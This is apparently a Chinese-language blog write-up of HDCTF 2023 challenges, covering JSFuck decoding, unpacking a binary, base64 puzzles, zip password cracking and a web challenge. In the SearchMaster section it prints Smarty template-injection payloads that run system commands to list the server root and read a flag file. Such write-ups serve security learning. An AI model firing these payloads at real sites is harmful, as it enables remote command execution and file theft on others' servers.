HDCTF

Welcome To HDCTF 2023

两种玩法
jsfuck解密
}F6P8IY}2W3O.png
和玩游戏就行了
玩到45分左右就好

easy_re

先用ide打开
看到有个
binary附加
看到有个壳
![)J6A[I$PHJ6I]2ZM)%OL9U.png
用这个脱壳
1682139357(1).png
再用ida打开,找到main
1682139401(1).png
看到是和a比较,说明很大概率是与flag有关
分析f3和func
一个逆序函数,一个是base加密
逆序没看懂,就没管(尴尬)
由此可知a后的密文是经过base加密过的
然后使用base解密工具,将常见的base都解码一遍
在第一个base64时就成功了
1682139148(1).png
1682139593(1).png

Normal_Rsa

答案就在文件里,没啥好说的

hardMisc

1682139909(1).png
最下面有个base加密字符串
base64解码就行

SearchMaster

1682153875(1).png
发现存在模板注入data={{4*4}}
1682154011(1).png
常用模板注入看下
image.png
发现是smarty模板注入,直接payload打data={if system('ls /')}{/if}
1682153840(1).png
看到了flag
data={if system('cat /flag_13_searchmaster')}{/if}
1682154187(1).png

ExtremeMisc

看到是压缩包,就直接改后缀就可以了
直接改成.zip发现可以
解压时发现有密码
直接爆破
我直接挂了1-6,就出来了
1682157848(1).png
得到压缩包后爆破得到密码
改后缀,发现不行
就用编辑器打开
看网上说这种一般是偏移或者旋转,不太懂就一个一个试
在左旋转这里
![]JJ((RO{I8%DB5CYNL4OQO.png
![%]Y6P7K]J4{6)N(}4EVX(DA.png](https://cdn.nlark.com/yuque/0/2023/png/34848307/1682159087198-97add81c-423d-4cd6-bd4f-fe84dc0844ce.png#averageHue=%23383632&clientId=u9b48a34e-f46d-4&from=paste&height=571&id=u9b965dd1&originHeight=857&originWidth=992&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=226885&status=done&style=none&taskId=u074cc3d5-497b-4736-84f6-760e209689c&title=&width=661.3333333333334)
这样子时成功了(我也不知道为啥,相当于爆破吧QAQ)
然后爆破密码
是9724
1682158555(1).png
在解压发现一个有密码一个没有
没有的里面有这个
1682158664(1).png
这里用明文爆破
爆了十分钟
密码是w98d@ud
[ZKO8P%S~YLFZ3887]`$4MR.png

posted @ 2023-08-17 21:58  Sdegree  阅读(27)  评论(0编辑  收藏  举报